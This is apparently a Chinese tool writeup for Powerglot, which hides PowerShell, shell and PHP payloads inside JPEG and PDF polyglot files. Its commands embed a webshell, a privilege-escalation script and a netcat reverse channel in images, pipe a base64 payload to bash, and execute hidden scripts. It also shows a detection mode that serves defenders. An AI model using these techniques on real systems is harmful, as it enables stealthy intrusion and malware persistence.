Powerglot可以利用Polyglots来对各种类型的脚本进行编码,比如说攻击性PowerShell脚本,而且还不须要加载器即可运行Payload。
在红队练习或其他攻击性任务中,Payload的伪装/隐蔽一样平常是通过隐写术来完成的,尤其是在躲避网络层保护机制的时候,这也是PowerShell Payload脚本开拓中比较常见的技能。近期的一些恶意软件和APT组织也都会选择类似的办法来进行攻击,比如说APT32、APT37、Ursnif、Powload、LightNeuron/Turla、Platinum APT、Waterbug/Turla、Lokibot、dukes(幽灵行动)和Tianium等等。
Powerglot是一款基于Polyglots开拓的多功能跨平台攻防工具,Powerglot许可开拓职员将脚本代码(PowerShell、Shell脚本和PHP等)隐写在数字图像中,目前该工具的开拓职员也正在添加新的文件格式支持。跟其他攻击性工具或恶意软件不同的是,Powerglot不须要任何加载器就可以实行隐蔽在目标文件中的信息了,这样可以将恶意程序在目标系统上的噪声降落到最小。
Powerglot在攻击/渗透任务中有着明确的用场,但它也适用于蓝队研究职员。据我们所知,该工具是第一个通用且完备开源的攻击性编码工具,它可以帮助广大研究职员利用Polyglots来搜索隐蔽信息,而这些信息可以帮助开拓职员在目标系统中实现恶意软件的隐蔽或持久性传染。
功能先容将PowerShell、Shell脚本和PHP等代码编码进图像文件中,并且支持在不须要任何加载器的情形下来规复/实行隐蔽的信息(Payload)。PowerGlot适用于多种文件格式,但是目前仅支持JPEG和PDF,其他格式支持目前正在开拓中。PowerGlot是一款完全开源的工具,可以帮助研究职员检测恶意代码,特殊是利用Truepolyglot 或stegoSploit等公共工具隐蔽的信息结果。目前,开拓职员正在给PowerGlot添加JPEG、PNG、GIF、BMP、ZIP、PDF、MP3等格式的支持。工具安装# git clone https://github.com/mindcrypt/powerglot# python3 powerglot工具利用&参数
下面给出的是如何利用Powerglot来隐蔽Payload的一些演示样例:
样例一-将PowerShell/PHP/Shell脚本隐蔽在一个JPEG图像中:# python3 powerglot.py -o payload.ps1 cat.jpg cat-hidden1.jpg# python3 powerglot.py -o webshell.php cat.jpg cat-hidden2.jpg# python3 powerglot.py -o shell.sh cat.jpg cat-hidden3.jpg样例二-将一个提权Shell脚本隐蔽在一个JPEG图像中:
# python3 powerglot.py -o linenum.sh cat.jpg cat-linenum.jpg# file cat-linenum.jpg (It is a valid JPEG file)# feh cat-lineum.jpg (The image is properly showed in an image viewer)# We can execute the script in several ways: a) cat cat-linenum | bash b) chmod +x cat-linenum.jpeg; ./cat-linenum.jpeg样例三-将一个netcat反向信道隐蔽在一个JPEG图像中:
# Attacker# echo "nc 127.0.0.1 4444" > netcat.sh# python3 powerglot.py -o netcat.sh cat.jpeg cat-netcat.jpeg# nc -nvlp 4444#Victim# chmod +x cat-netcat.jpg | ./cat-netcat.jpg样例四-PDF隐蔽:
# Create b64.sh with your favourite payloadbase64 Linenum.sh -w 0 > b64.sh# Edit b64.shecho "code in b64.sh" | base64 -d | bash;# python3 powerglot -o b64.sh sample.pdf test.pdf# file test.pdf# xpdf test.pdf# Execute payload# cat test.pdf | bash or chmod +x test.pdf; ./test.pdf样例五:
# python3 powerglot.py -o script.ps1 cat.jpeg cat-ps.jpeg# file cat-ps.jpeg# feh cat-ps.jpeg# Execute payload (example)# cat cat-ps.jpeg | pwshPS /home/alfonso/PowerGlot/POWERSHELL> get-process;<#hola <# mundo#>NPM(K) PM(M) WS(M) CPU(s) Id SI ProcessName------ ----- ----- ------ -- -- -----------0 0,00 2,70 0,00 830 829 (sd-pam)0 0,00 0,00 0,00 75 0 acpi_thermal_pm0 0,00 4,80 0,00 1217 854 agent0 0,00 1,70 0,00 748 748 agetty0 0,00 40,77 1,01 1198 854 applet.py0 0,00 6,29 0,00 938 938 at-spi-bus-launcher0 0,00 6,61 5,64 953 938 at-spi2-registryd0 0,00 0,00 0,00 131 0 ata_sff0 0,00 1,77 0,00 8906 …78 atom0 0,00 218,81 585,95 8908 …78 atom0 0,00 236,18 176,24 8947 …78 atom0 0,00 142,14 2,51 9009 …78 atom0 0,00 81,54 3,32 8932 …78 atom --type=gpu-process --enable-features=SharedArrayBuffer -…0 0,00 39,44 0,01 8910 …78 atom --type=zygote --no-sandbox0 0,00 5,62 0,11 1370 …70 bash0 0,00 5,36 0,66 5278 …78 bash0 0,00 6,34 1,48 6778 …78 bash0 0,00 0,00 0,00 68 0 blkcg_punt_bio0 0,00 46,73 2,20 1199 854 blueman-applet0 0,00 50,25 1,64 1301 854 blueman-tray在文件系统中检测隐蔽代码
#python3 powerglot.py -d ./--= [Detecting polyglots] --=..............................................................[Suspicious file]-[ ./cat-end-extra2.jpg ]..[Suspicious file]-[ ./cat-end-extra3.jpg ][Polyglot Stegosploit][EOF Signature: / -->].................................................................................[Suspicious file]-[ ./cat-end-extra1.jpg ]..容许证协议
本项目的开拓与发布遵照GPL v3开源容许证协议。
项目地址Powerglot:【https://github.com/mindcrypt/powerglot】
